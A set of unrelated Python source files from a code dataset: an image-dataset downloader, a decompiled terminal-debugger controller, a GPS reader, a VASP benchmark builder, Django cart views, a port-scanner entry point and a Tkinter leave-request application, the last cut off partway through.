r.raw.decode_content = True\n shutil.copyfileobj(r.raw, f)\n\n\ndef parse(data, data_type=\"pokemon_yes_no\", black_list=None, file_type=None):\n url = data[\"fields\"][\"url\"]\n filename = url.split(\"/\")[-1]\n\n url_hash = int(hashlib.sha1(url.encode(\"utf-8\")).hexdigest(), 16) % 100\n\n if data_type == \"pokemon_yes_no\":\n label = data[\"fields\"][\"classified\"]\n elif data_type == \"pokemon_classification\":\n label = data[\"fields\"][\"original_label\"]\n else:\n label = data[\"fields\"][\"selected\"]\n\n if url_hash < 90:\n target_path = \"data/{}/train/{}\".format(data_type, label)\n else:\n target_path = \"data/{}/validate/{}\".format(data_type, label)\n\n if black_list and target_path + \"/\" + filename in black_list:\n print(\"Skipping {} since it is listed in blacklist\".format(url))\n return\n\n save_image(url, target_path, filename, file_type)\n\n\ndef validate_image(data_type=\"pokemon_yes_no\"):\n print(\"Validate Images\")\n if pathlib.Path(\"blacklist.json\").exists():\n with open(\"blacklist.json\", \"r\") as f:\n ignore_list = json.load(f)\n else:\n ignore_list = []\n for file_path in pathlib.Path(\"data/\" + data_type + 
\"/\").glob(\"**/*\"):\n if file_path.is_file():\n str_file_path = str(file_path)\n normalized_str_file_path = str_file_path.replace(\"\\\\\", \"/\")\n if normalized_str_file_path in ignore_list:\n print(\"Skipping {}\".format(file_path))\n file_path.unlink()\n continue\n\n img = tf.io.read_file(str_file_path)\n try:\n tf.image.decode_jpeg(img, channels=3)\n except Exception:\n print(\"Converting\", str_file_path)\n\n try:\n im = Image.open(str_file_path)\n try:\n im.save(str_file_path, \"JPEG\")\n\n except Exception:\n im.close()\n print(\"Converting Failed add to ignore list\")\n file_path.unlink()\n\n if normalized_str_file_path not in ignore_list:\n ignore_list.append(normalized_str_file_path)\n except Exception:\n file_path.unlink()\n\n if normalized_str_file_path not in ignore_list:\n ignore_list.append(normalized_str_file_path)\n\n with open(\"blacklist.json\", \"w\") as w:\n w.write(json.dumps(ignore_list))\n\n\ndef download_pokemon(session, file_type, label=\"yes\"):\n download(\n url=\"http://13.125.1.208/book/pokemon_export/\",\n file_type=file_type,\n label=label,\n session=session,\n )\n\n\ndef download_people(session, file_type, label=\"True\"):\n download(\n url=\"http://13.125.1.208/book/people_result/download/\",\n file_type=file_type,\n label=label,\n data_type=\"people\",\n session=session,\n )\n\n\ndef download(url, session, label=\"True\", data_type=\"pokemon_yes_no\", file_type=None):\n page = 1\n\n black_list_path = pathlib.Path(\"blacklist.json\")\n black_list = None\n if black_list_path.exists():\n with open(black_list_path) as f:\n black_list = json.load(f)\n black_list = set(black_list)\n\n parse_function = functools.partial(\n parse, data_type=data_type, black_list=black_list, file_type=file_type\n )\n with multiprocessing.Pool(5) as pool:\n while True:\n request_url = url + label + \"/\" + str(page)\n results = session.get(url + label + \"/\" + str(page))\n print(request_url)\n\n pickled = base64.b85decode(results.text)\n\n decompressed = lz4.frame.decompress(pickled)\n\n with open(\"./zip.txt\", \"w\") as w:\n w.write(results.text)\n\n data = decompressed.decode(\"utf-8\")\n with open(\"./result.txt\", \"w\") as w:\n w.write(data)\n\n data_json = json.loads(data)\n image_list = data_json[\"image_list\"]\n\n with tqdm.tqdm(total=len(image_list)) as pbar:\n for i, _ in enumerate(pool.imap_unordered(parse_function, image_list)):\n pbar.update()\n page += 1\n if not data_json[\"has_next\"]:\n break\n","sub_path":"src/train/data_downloader.py","file_name":"data_downloader.py","file_ext":"py","file_size_in_byte":5958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"566885847","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.6 (62161)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.4-x86_64/egg/trachet/controller.py\n# Compiled at: 2014-07-01 10:29:06\n_DEBUG_MODE_NONE = 0\n_DEBUG_MODE_NORMAL_STEP = 1\n_DEBUG_MODE_FUZZY_STEP = 2\n_DEBUG_MODE_STOP = 3\nimport constant, time\n\nclass ActionController(object):\n __mode = _DEBUG_MODE_NONE\n __actions = None\n __accel = 1.0\n __lastcalltime = 0\n\n def __init__(self, tty):\n self.__mode = _DEBUG_MODE_NONE\n self.__actions = []\n self.__tty = tty\n self.__accel = 1.0\n\n def is_suspended(self):\n return self.__mode != _DEBUG_MODE_NONE\n\n def append(self, action):\n return self.__actions.append(action)\n\n def resume(self):\n self.__mode = _DEBUG_MODE_NONE\n\n def 
set_normal_step(self):\n self.__mode = _DEBUG_MODE_NORMAL_STEP\n\n def set_fuzzy_step(self):\n self.__mode = _DEBUG_MODE_FUZZY_STEP\n\n def set_break(self):\n self.__mode = _DEBUG_MODE_STOP\n\n def _get_repeat_count(self):\n now = time.time()\n if now - self.__lastcalltime < 0.1:\n self.__accel *= 1.2\n else:\n self.__accel = 1\n self.__lastcalltime = now\n repeat = max(1, self.__accel)\n return repeat\n\n def tick(self):\n if self.__mode == _DEBUG_MODE_NONE:\n while self.__actions:\n action = self.__actions.pop(0)\n result = action()\n\n elif self.__mode == _DEBUG_MODE_NORMAL_STEP:\n self.__mode = _DEBUG_MODE_STOP\n repeat = self._get_repeat_count()\n while repeat > 0 and self.__actions:\n repeat -= 1\n action = self.__actions.pop(0)\n result = action()\n\n elif self.__mode == _DEBUG_MODE_FUZZY_STEP:\n self.__mode = _DEBUG_MODE_STOP\n repeat = self._get_repeat_count()\n while repeat > 0:\n repeat -= 1\n while self.__actions:\n action = self.__actions.pop(0)\n result = action()\n if result != constant.SEQ_TYPE_CHAR:\n break\n else:\n return\n\n\nif __name__ == '__main__':\n import doctest\n doctest.testmod()","sub_path":"pycfiles/trachet-1.0.9-py2.6/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":2363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"198163241","text":"import serial\nimport pynmea2\nimport numpy as np\nser = serial.Serial('/dev/ttyUSB0',baudrate=4800)\nser.flushInput()\nwhile True:\n a= ser.readline()\n a = a.decode(\"utf-8\")\n nmeaobj = np.array(a.split(\",\"))\n if nmeaobj[0] == \"$GPRMC\":\n print(\"Latitude = \",str(nmeaobj[3]),str(nmeaobj[4]))\n print(\"Longitude = \",str(nmeaobj[5]),str(nmeaobj[6]))","sub_path":"gps.py","file_name":"gps.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"389526212","text":"import pymatgen.io.vasp.inputs as pmg\nimport subprocess\nimport os\nimport fileinput\nfrom utilities import *\nfrom benchmark_runner import *\n\ndef read_and_choose_test_data(INCAR=\"INCAR\",KPOINTS=\"KPOINTS\",POSCAR=\"POSCAR\",POTCAR=\"POTCAR\",submission=\"submit.pbs\",name=\"calculation\"):\n\t\"\"\"read_and_choose_test_data: Given file names for INCAR, KPOINTS, POSCAR, POTCAR, and a submission script, as well as a name for the calculation folder,\n\treads each file into a corresponding pymatgen vasp input object. 
Then it chooses test data for default benchmarking calculations,\n\tcreates calculation folders, and returns a list of folder names for testing ENCUT values, a list of folder names for testing ka values,\n\ta list of encut values to be tested, and a list of ka values to be tested.\"\"\"\n\tprint(\"fetching files\")\n\tincar = pmg.Incar.from_file(INCAR)\n\tkpoints = pmg.Kpoints.from_file(KPOINTS)\n\tposcar = pmg.Poscar.from_file(POSCAR)\n\tpotcar = pmg.Potcar.from_file(POTCAR)\n\tsubmit = open(submission, \"r\").read()\n\treturn choose_test_data(incar,kpoints,poscar,potcar,submit,name)\n\ndef choose_test_data(incar,kpoints,poscar,potcar,submit,name):\n\t\"\"\"choose_test_data: Given Incar, Kpoints, Poscar, and Potcar objects from pymatgen.io.vasp.inputs, as well as a submission script represented\n\tas a string and a name for the folder in which to deposit calculation folders, chooses values of encut and ka values to test\n\tand makes folders with vasp input files for each set of values to be tested inside a new main calculatuon folder.\n\tReturns a list of folder names for testing ENCUT values, a list of folder names for testing ka values, a list of ENCUT values \n\tto be tested, and a list of ka values to be tested.\"\"\"\n\tsubprocess.call([\"mkdir\", name])\n\tcurrent_dir = os.getcwd()\n\tos.chdir(current_dir+\"/\"+name)\n\tprint(\"generating data combinations\")\n\tka_folder_list = []\n\tencut_folder_list = []\n\tencut_list = [150,200,250,300,350,400,450,500,550,600,650,700,750]\n\tlattice = poscar.structure.lattice\n\tk_list, k_mul_a_lst = make_kpoint_sets(lattice.a, lattice.b, lattice.c)\n\tfor i in range(len(k_list)):\n\t\tka_folder_list.append(make_calculation_folder(600, k_list[i], k_mul_a_lst[i], incar, kpoints, poscar, potcar, submit))\n\tconst_k_set = k_list[0]\n\tconst_k_mul_a = k_mul_a_lst[0]\n\tfor i in range(len(k_list)):\n\t\tnew_av = sum(k_list[i])/3\n\t\told_av = sum(const_k_set)/3\n\t\tif abs(new_av-10) < abs(old_av-10):\n\t\t\tconst_k_set = k_list[i]\n\t\t\tconst_k_mul_a = k_mul_a_lst[i]\n\tfor encut in encut_list:\n\t\tencut_folder_list.append(make_calculation_folder(encut, const_k_set, const_k_mul_a, incar, kpoints, poscar, potcar, submit))\n\tos.chdir(current_dir)\n\treturn encut_folder_list, ka_folder_list, encut_list, k_mul_a_lst\n\n\ndef make_calculation_folder(encut, k_set, k_mul_a, incar, kpoints, poscar, potcar, submit, name=None):\n\t\"\"\"make_calculation_folder: Given an ENCUT value to be tests, a set of KPOINTS to be tested, a ka to be tested,\n\tvasp input objects Incar, Kpoints, Poscar, and Potcar, and a submission script as a string, try to make a folder\n\tcontaining the given files with the given inputs.\"\"\"\n\tif not name: name = str(encut) + \"encut-\" + str(round(k_mul_a,2)) + \"ka\"\n\ttry:\n\t\tsubmit = submit.replace(\"#PBS -N TEST_name\", \"#PBS -N \" + name)\n\t\tsubprocess.call([\"mkdir\", name])\n\t\tcurrent_dir = os.getcwd()\n\t\tos.chdir(current_dir+\"/\"+name)\n\t\tincar[\"ENCUT\"] = encut\n\t\tincar[\"NSW\"] = 0\n\t\tincar.write_file(\"INCAR\")\n\t\tkpoints.kpts = [k_set]\n\t\tkpoints.write_file(\"KPOINTS\")\n\t\tposcar.write_file(\"POSCAR\")\n\t\tpotcar.write_file(\"POTCAR\")\n\t\topen(\"submit.pbs\", \"w\").write(submit)\n\t\tos.chdir(current_dir)\n\texcept:\n\t\tprint(\"Could not make the desired directory \"+ name)\n\treturn name\n\ndef make_benchmark_folder():\n\t\"\"\"make_benchmark_folder: Asks the user for the names of VASP input files, submission script, and their choice of\n\tnew directory in which to deposit calculation 
folder, runs read_and_choose_test_data.\"\"\"\n\tread_and_choose_test_data(input(\"Incar file name: \"),\\\n\t\tinput(\"Kpoints file name: \"),\\\n\t\tinput(\"Poscar file name: \"),\\\n\t\tinput(\"Potcar file name: \"),\\\n\t\tinput(\"Submission script name: \"),\\\n\t\tinput(\"Benchmark folder name: \"))","sub_path":"benchmark_builder.py","file_name":"benchmark_builder.py","file_ext":"py","file_size_in_byte":4110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"493515854","text":"from rest_framework import viewsets, mixins\nfrom rest_framework.decorators import action\nfrom rest_framework.response import Response\n\nfrom carts.models import Cart\nfrom carts.serializers import CartSerializer\nfrom utils.func import manage_cart\nfrom utils.status_code import SUCCESS\n\n\nclass CartView(viewsets.GenericViewSet,\n mixins.ListModelMixin,\n mixins.UpdateModelMixin):\n \"\"\"购物车\"\"\"\n queryset = Cart.objects.all()\n serializer_class = CartSerializer\n\n def list(self, request, *args, **kwargs):\n \"\"\"显示购物车商品\"\"\"\n user = request.user\n # 获取当前用户的的购物车信息\n queryset = self.get_queryset().filter(user=user)\n serializer = self.get_serializer(queryset, many=True)\n total_price = 0\n all_select = 1\n for item in queryset:\n # 计算选择商品的总价\n if item.is_select:\n total_price += item.num * item.goods.price\n else:\n all_select = 0\n data = {'carts': serializer.data,\n 'total_price': total_price,\n 'all_select': all_select,\n 'username': user.username,\n 'mobile': user.mobile}\n return Response(data)\n\n def update(self, request, *args, **kwargs):\n \"\"\"修改商品选择\"\"\"\n # 获取到当前的对象实例\n instance = self.get_object()\n instance.is_select = not instance.is_select\n instance.save()\n return Response({'code': SUCCESS[0], 'msg': SUCCESS[1]})\n\n @action(methods=['POST'], detail=False)\n def add_cart(self, request):\n \"\"\"添加商品到购物车\"\"\"\n manage_cart(request, 1)\n return Response({'code': SUCCESS[0], 'msg': SUCCESS[2]})\n\n @action(methods=['POST'], detail=False)\n def sub_cart(self, request):\n \"\"\"删除商品\"\"\"\n manage_cart(request, 0)\n return Response({'code': SUCCESS[0], 'msg': SUCCESS[3]})\n\n @action(methods=['PATCH'], detail=False)\n def change_select(self, request):\n \"\"\"是否全选商品\"\"\"\n user = request.user\n if Cart.objects.filter(user=user, is_select=False).exists():\n # 判断是否有未选择的商品,如果有将选择属性修改为True\n Cart.objects.filter(user=user).update(is_select=True)\n else:\n Cart.objects.filter(user=user).update(is_select=False)\n return Response({'code': SUCCESS[0], 'msg': SUCCESS[1]})\n","sub_path":"lsj/carts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"334720588","text":"#!/usr/bin/env python3\n\nimport json\n\nfrom portscanner.argumentparser import ArgumentParser, help_message\nfrom portscanner.core import ScanController, ScanTarget\n\n\ndef main():\n arg_parser = ArgumentParser()\n\n if not arg_parser.has_valid_args():\n help_message()\n\n st = ScanTarget(arg_parser.ip, arg_parser.methods_ports)\n ps = ScanController(st)\n\n if arg_parser.json:\n results = ps.scan_to_list(arg_parser.threads)\n json_object = json.dumps(results, default=lambda sr: sr.__dict__(), indent=4)\n print(json_object)\n\n else:\n print('Scanning for IP {}'.format(arg_parser.ip))\n print('METHOD\\tPORT\\tSTATUS')\n ps.scan(arg_parser.threads)\n\n\nif __name__ == '__main__':\n try:\n main()\n\n except KeyboardInterrupt:\n 
exit()\n","sub_path":"portscanner.py","file_name":"portscanner.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"73117178","text":"from tkinter import *\nimport tkinter.messagebox as message_box\nfrom tkinter import ttk\nimport datetime\nimport calendar\nimport os\nimport sqlite3\n\nfrom sqlite3 import Error\n\ntry:\n conn = sqlite3.connect('draft.s3db')\n c = conn.cursor()\nexcept Error as e:\n print(e)\n\nnow = datetime.datetime.now()\n\n# ---- Variables ----\n\nday_of_week = calendar.day_abbr[now.weekday()]\nday = now.day\nmonth = calendar.month_name[now.month]\nyear = now.year\npolicy_path = \"leave_policy.txt\"\nnum_pending_requests = 1\nhalf_day = 0 # 0 for full day, 1 for half day\n# test data\nnum_days = 15\nrequest_id = 1234\nleave_date = \"13/06/19\"\nsubmission_date = \"03/05/19\"\nleave_type = \"Holiday\"\nemp_name = \"Abel Maclead\"\nemp_comment = \"I am going on holiday\"\nsigned_off = \"No\"\nmgr_comment = \"All employees must attend on this date\"\nmgr_name = \"Steven Tasks\"\nviewer_listbox_headers = ('RequestID', 'Date', 'Signed Off')\nmanager_listbox_headers = ('RequestID', 'Date', 'EmpID', 'Name')\n\n\n# ---- Methods ----\n\ndef open_leave_request():\n print(\"Opening Leave Request Form\")\n ShowLeaveRequestForm()\n leaverequestform.mainloop()\n\n\ndef open_request_viewer():\n print(\"Opening Request Viewer\")\n ShowRequestViewerForm()\n requestviewerform.mainloop()\n\n\ndef open_employee_calendar():\n print(\"Opening Employee Calendar\")\n os.startfile(r'EmployeeCalendarForm.py')\n\n\ndef open_policy_viewer():\n print(\"Opening Policy Viewer Form\")\n ShowPolicyViewerForm()\n policyviewerform.mainloop()\n\n\ndef open_manager_calendar():\n print(\"Opening Manager Calendar\")\n # print(\"*Actually opens calendar options form* LIKE A BOSS\")\n # os.startfile(r'CalendarOptionsForm.py')\n os.startfile(r'ManagerCalendarForm.py')\n\n\ndef open_request_manager():\n print(\"Opening Leave Request Manager\")\n os.startfile(r'RequestManagerForm.py')\n\n\ndef close_policy_form():\n policyviewerform.destroy()\n\n\ndef submit_request():\n message_box.showinfo(\"\", \"Leave Request Submitted\")\n leaverequestform.destroy()\n\n\ndef cancel_request():\n print(\"Leave Request Cancelled\")\n leaverequestform.destroy()\n\n\ndef amend_request():\n print(\"Amending Request\")\n ShowLeaveRequestForm()\n leaverequestform.mainloop()\n\n\ndef revoke_request():\n result = message_box.askquestion(\"Revoke Request\", \"Are you sure you want to revoke this request?\", icon='warning')\n\n if result == 'yes':\n message_box.showinfo(\"\", \"Request Revoked\")\n print(\"Request Revoked\")\n else:\n print(\"Request Revoke Canceled\")\n\n\ndef ShowEmployeeDashboardForm():\n global employeedashboardform\n employeedashboardform = Toplevel()\n employeedashboardform.title(\"Employee Leave Dashboard\")\n screen_width = employeedashboardform.winfo_screenwidth()\n screen_height = employeedashboardform.winfo_screenheight()\n empFrmwidth = 900\n empFrmheight = 500\n x = (screen_width / 2) - (empFrmwidth / 2)\n y = (screen_height / 2) - (empFrmheight / 2)\n employeedashboardform.geometry('%dx%d+%d+%d' % (empFrmwidth, empFrmheight, x, y))\n employeedashboardform.resizable(0, 0)\n employeedashboardform.geometry(\"%dx%d+%d+%d\" % (empFrmwidth, empFrmheight, x, y))\n EmployeeDashboardForm()\n\n\ndef ShowManagerDashboardForm():\n global managerdashboardform\n managerdashboardform = Toplevel()\n 
managerdashboardform.title(\"Manager Leave Dashboard\")\n screen_width = managerdashboardform.winfo_screenwidth()\n screen_height = managerdashboardform.winfo_screenheight()\n manFrmWidth = 900\n manFrmHeight = 650\n x = (screen_width / 2) - (manFrmWidth / 2)\n y = (screen_height / 2) - (manFrmHeight / 2)\n managerdashboardform.geometry('%dx%d+%d+%d' % (manFrmWidth, manFrmHeight, x, y))\n managerdashboardform.resizable(0, 0)\n managerdashboardform.geometry(\"%dx%d+%d+%d\" % (manFrmWidth, manFrmHeight, x, y))\n ManagerDashboardForm()\n\n\ndef ShowPolicyViewerForm():\n global policyviewerform\n policyviewerform = Toplevel()\n policyviewerform.title(\"Leave Policy Viewer\")\n screen_width = policyviewerform.winfo_screenwidth()\n screen_height = policyviewerform.winfo_screenheight()\n viewFrmWidth = 900\n viewFrmHeight = 600\n x = (screen_width / 2) - (viewFrmWidth / 2)\n y = (screen_height / 2) - (viewFrmHeight / 2)\n policyviewerform.geometry('%dx%d+%d+%d' % (viewFrmWidth, viewFrmHeight, x, y))\n policyviewerform.resizable(0, 0)\n policyviewerform.geometry(\"%dx%d+%d+%d\" % (viewFrmWidth, viewFrmHeight, x, y))\n PolicyViewerForm()\n\n\ndef ShowLeaveRequestForm():\n global leaverequestform\n leaverequestform = Toplevel()\n leaverequestform.title(\"Leave Request Form\")\n screen_width = leaverequestform.winfo_screenwidth()\n screen_height = leaverequestform.winfo_screenheight()\n requestFrmWidth = 900\n requestFrmHeight = 550\n x = (screen_width / 2) - (requestFrmWidth / 2)\n y = (screen_height / 2) - (requestFrmHeight / 2)\n leaverequestform.geometry('%dx%d+%d+%d' % (requestFrmWidth, requestFrmHeight, x, y))\n leaverequestform.resizable(0, 0)\n leaverequestform.geometry(\"%dx%d+%d+%d\" % (requestFrmWidth, requestFrmHeight, x, y))\n LeaveRequestForm()\n\n\ndef ShowRequestViewerForm():\n global requestviewerform\n requestviewerform = Toplevel()\n requestviewerform.title(\"Leave Request Viewer Form\")\n screen_width = requestviewerform.winfo_screenwidth()\n screen_height = requestviewerform.winfo_screenheight()\n viewerFrmWidth = 900\n viewerFrmHeight = 500\n x = (screen_width / 2) - (viewerFrmWidth / 2)\n y = (screen_height / 2) - (viewerFrmHeight / 2)\n requestviewerform.geometry('%dx%d+%d+%d' % (viewerFrmWidth, viewerFrmHeight, x, y))\n requestviewerform.resizable(0, 0)\n requestviewerform.geometry(\"%dx%d+%d+%d\" % (viewerFrmWidth, viewerFrmHeight, x, y))\n RequestViewerForm()\n\n\ndef EmployeeDashboardForm():\n ufix_logo = PhotoImage(file=\"UfixLogo.png\")\n mini_calendar = PhotoImage(file=\"calendar.png\")\n\n TopLabels = Frame(employeedashboardform, width=900, height=400, relief=\"raise\")\n TopLabels.pack(side=TOP, padx=20)\n\n TopLabels.grid_rowconfigure(0, weight=1)\n TopLabels.grid_columnconfigure(0, weight=1)\n\n Notification = Frame(employeedashboardform, width=900, height=70, relief=\"raise\")\n Notification.pack(side=TOP, padx=20, pady=20)\n Buttons = Frame(employeedashboardform, width=900, height=180, relief=\"raise\")\n Buttons.pack(side=BOTTOM, fill=BOTH, expand=YES)\n\n Buttons.grid_rowconfigure(0, weight=1)\n Buttons.grid_columnconfigure(0, weight=1)\n\n lbl_title = Label(TopLabels, justify=LEFT, anchor=W, width=100, font=('Arial', 20),\n text=\"Welcome \" + user_name + \"\\n\\nYou currently have \" + str(\n num_days) + \" days of leave remaining.\")\n lbl_title.grid(row=0, column=0)\n\n lbl_notify_expire = Label(Notification, width=100, height=2, font=('Arial', 20), text=\"\")\n lbl_notify_expire.pack()\n\n pic_mini_calendar = Label(TopLabels, anchor=NE, 
image=mini_calendar)\n\n pic_mini_calendar.grid(row=0, column=3)\n\n pic_ufix_logo = Label(Buttons, anchor=SE, justify=RIGHT, image=ufix_logo)\n\n pic_ufix_logo.grid(row=2, column=3)\n\n lbl_current_date = Label(TopLabels, width=11, bg=\"#fff\", font=('Arial', 15),\n text=day_of_week + \" \" + str(day) + \"\\n\" + month + \"\\n\" + str(year))\n lbl_current_date.grid(row=0, column=3)\n\n btn_createRequest = Button(Buttons, width=15, font=('Arial', 20), text=\"Request Leave\",\n command=open_leave_request)\n btn_createRequest.grid(row=0, column=1, padx=2)\n\n btn_viewRequests = Button(Buttons, width=15, font=('Arial', 20), text=\"View Requests\",\n command=open_request_viewer)\n btn_viewRequests.grid(row=0, column=2, padx=2)\n\n btn_viewCalendar = Button(Buttons, width=15, font=('Arial', 20), text=\"View Calendar\", padx=20,\n command=open_employee_calendar)\n btn_viewCalendar.grid(row=0, column=3, padx=2)\n\n btn_viewPolicy = Button(Buttons, width=20, font=('Arial', 20), text=\"View UFix Ltd. Leave Policy\", padx=20,\n command=open_policy_viewer)\n\n btn_viewPolicy.grid(row=2, column=2)\n\n if days_expiring_soon > 0:\n lbl_notify_expire.configure(bg='#e6586f')\n lbl_notify_expire.configure(fg='white')\n if days_expiring_soon == 1:\n lbl_notify_expire.configure(\n text=\"! You have \" + str(days_expiring_soon) + \" day which need to be booked soon\")\n else:\n lbl_notify_expire.configure(\n text=\"! You have \" + str(days_expiring_soon) + \" days which need to be booked soon\")\n\n\ndef ManagerDashboardForm():\n TopLabels = Frame(managerdashboardform, width=900, height=400, relief=\"raise\")\n TopLabels.pack(side=TOP, padx=20)\n\n TopLabels.grid_rowconfigure(0, weight=1)\n TopLabels.grid_columnconfigure(0, weight=1)\n\n Notification = Frame(managerdashboardform, width=900, height=70, relief=\"raise\")\n Notification.pack(side=TOP, padx=20, pady=20)\n\n Buttons = Frame(managerdashboardform, width=900, height=100, relief=\"raise\")\n Buttons.pack(side=BOTTOM, fill=BOTH, expand=YES)\n\n Buttons.grid_rowconfigure(1, weight=1)\n Buttons.grid_columnconfigure(1, weight=1)\n\n lbl_title = Label(TopLabels, justify=LEFT, anchor=W, width=100, font=('Arial', 20),\n text=\"Welcome \" + user_name + \"\\n\\nYou currently have \" + str(\n num_days) + \" days of leave remaining.\")\n lbl_title.grid(row=0, column=0)\n\n lbl_notify_expire = Label(Notification, width=100, height=2, font=('Arial', 20), text=\"\")\n lbl_notify_expire.pack()\n\n lbl_notify_requests = Label(Notification, width=100, height=2, font=('Arial', 20), text=\"\")\n lbl_notify_requests.pack(pady=4)\n\n mini_calendar = PhotoImage(file=\"calendar.png\")\n pic_mini_calendar = Label(TopLabels, anchor=NE, image=mini_calendar)\n\n pic_mini_calendar.grid(row=0, column=3)\n\n ufix_logo = PhotoImage(file=\"UfixLogo.png\")\n pic_ufix_logo = Label(Buttons, justify=RIGHT, image=ufix_logo)\n\n pic_ufix_logo.grid(row=3, column=2)\n\n lbl_current_date = Label(TopLabels, width=11, bg=\"#fff\", font=('Arial', 15),\n text=day_of_week + \" \" + str(day) + \"\\n\" + month + \"\\n\" + str(year))\n lbl_current_date.grid(row=0, column=3)\n\n btn_createRequest = Button(Buttons, width=15, font=('Arial', 20), text=\"Request Leave\", command=open_leave_request)\n\n btn_createRequest.grid(row=0, column=0, padx=75)\n\n btn_viewRequests = Button(Buttons, width=15, font=('Arial', 20), text=\"View Your Requests\",\n command=open_request_viewer)\n btn_viewRequests.grid(row=2, column=0)\n\n btn_viewCalendar = Button(Buttons, width=15, font=('Arial', 20), text=\"View 
Calendar\",\n command=open_manager_calendar)\n btn_viewCalendar.grid(row=0, column=1)\n\n btn_manageRequests = Button(Buttons, width=15, font=('Arial', 20), text=\"Manage Requests\",\n command=open_request_manager)\n btn_manageRequests.grid(row=2, column=1)\n\n btn_viewPolicy = Button(Buttons, width=40, font=('Arial', 20), padx=30, text=\"View UFix Ltd. Leave Policy\",\n command=open_policy_viewer)\n btn_viewPolicy.grid(row=3, column=0, columnspan=2)\n\n if days_expiring_soon > 0:\n lbl_notify_expire.configure(bg='#e6586f')\n lbl_notify_expire.configure(fg='white')\n if days_expiring_soon == 1:\n lbl_notify_expire.configure(\n text=\"! You have \" + str(days_expiring_soon) + \" day which need to be booked soon\")\n else:\n lbl_notify_expire.configure(\n text=\"! You have \" + str(days_expiring_soon) + \" days which need to be booked soon\")\n\n if num_pending_requests > 0:\n lbl_notify_requests.configure(bg='#7bbc6e')\n lbl_notify_requests.configure(fg='white')\n if num_pending_requests == 1:\n lbl_notify_requests.configure(text=\"* There is \" + str(num_pending_requests) + \" pending leave request\")\n else:\n lbl_notify_requests.configure(text=\"* There are \" + str(num_pending_requests) + \" pending leave requests\")\n\n\ndef PolicyViewerForm():\n Policy = Frame(policyviewerform, width=900, height=350, relief=\"raise\")\n Policy.pack(side=TOP, padx=20)\n\n CloseButton = Frame(policyviewerform, width=900, height=150, relief=\"raise\")\n CloseButton.pack(side=BOTTOM)\n\n btn_close = Button(CloseButton, width=15, font=('Arial', 20), text=\"Close\", command=close_policy_form)\n btn_close.pack(side=RIGHT, anchor=SE)\n\n txt_policy = Text(Policy, width=76, height=23, font=('Arial', 15))\n txt_policy.pack(side=LEFT, anchor=NW)\n txt_policy.insert(END, open(policy_path).read())\n txt_policy.configure(state=DISABLED)\n txt_scroll = ttk.Scrollbar(Policy, orient=\"vertical\", command=txt_policy.yview)\n\n txt_policy.configure(yscrollcommand=txt_scroll.set)\n\n txt_scroll.pack(side=RIGHT, anchor=E, fill=\"y\", )\n\n\ndef LeaveRequestForm():\n TopLabels = Frame(leaverequestform, width=900, height=400, relief=\"raise\")\n TopLabels.pack(side=TOP, padx=20)\n\n TopLabels.grid_rowconfigure(0, weight=1)\n TopLabels.grid_columnconfigure(0, weight=1)\n\n Options = Frame(leaverequestform, width=450, height=180, relief=\"raise\")\n Options.pack(side=TOP, fill=BOTH, expand=YES)\n\n Options.grid_rowconfigure(0, weight=1)\n Options.grid_columnconfigure(0, weight=1)\n\n Buttons = Frame(leaverequestform, width=800, height=180, relief=\"raise\")\n Buttons.pack(side=LEFT, fill=BOTH, expand=YES)\n\n Buttons.grid_rowconfigure(0, weight=1)\n Buttons.grid_columnconfigure(0, weight=1)\n\n Logo = Frame(leaverequestform, width=100, height=180, relief=\"raise\")\n Logo.pack(side=RIGHT, fill=BOTH, expand=YES)\n\n Logo.grid_rowconfigure(0, weight=1)\n Logo.grid_columnconfigure(0, weight=1)\n\n lbl_title = Label(TopLabels, justify=LEFT, anchor=W, width=100, font=('Arial', 20),\n text=\"You currently have \" + str(num_days) + \" days of leave remaining.\\n\\n\" + \"Request ID: #\" + str(request_id) + \"\\nEmployee ID: \" + str(emp_no))\n lbl_title.grid(row=0, column=0)\n\n mini_calendar = PhotoImage(file=\"calendar.png\")\n pic_mini_calendar = Label(TopLabels, anchor=NE, image=mini_calendar)\n\n pic_mini_calendar.grid(row=0, column=3)\n\n ufix_logo = PhotoImage(file=\"UfixLogo.png\")\n pic_ufix_logo = Label(Logo, anchor=SE, justify=RIGHT, image=ufix_logo)\n\n pic_ufix_logo.grid(row=0, column=0)\n\n lbl_current_date = 
Label(TopLabels, width=11, bg=\"#fff\", font=('Arial', 15),\n text=day_of_week + \" \" + str(day) + \"\\n\" + month + \"\\n\" + str(year))\n lbl_current_date.grid(row=0, column=3)\n\n lbl_leave_date = Label(Options, width=11, font=('Arial', 20), text=\"Leave Date: \", justify=LEFT)\n lbl_leave_date.grid(row=0, column=0)\n\n lbl_comments = Label(Options, width=11, font=('Arial', 20), text=\"Comments: \", justify=LEFT)\n lbl_comments.grid(row=0, column=2)\n\n lbl_leave_type = Label(Options, width=11, font=('Arial', 20), text=\"Leave Type: \", justify=LEFT)\n lbl_leave_type.grid(row=2, column=0)\n\n btn_cancel = Button(Buttons, width=15, font=('Arial', 20), text=\"Cancel\", command=cancel_request)\n btn_cancel.grid(row=0, column=1, padx=2)\n\n cmb_date_picker = ttk.Combobox(Options, width=15, font=('Arial', 20))\n cmb_date_picker['values'] = \"peekaboo\"\n cmb_date_picker.grid(row=0, column=1)\n\n cmb_leave_type = ttk.Combobox(Options, width=15, font=('Arial', 20))\n cmb_leave_type['values'] = (\"Holiday\", \"Paternity\", \"Emergency\", \"Sickness\", \"Bereavement\")\n cmb_leave_type.grid(row=2, column=1)\n\n txt_comments = Text(Options, width=20, height=5, font=('Arial', 20))\n txt_comments.grid(row=0, column=3, padx=2)\n\n opt_full_day = ttk.Radiobutton(Options, width=20, variable=half_day, 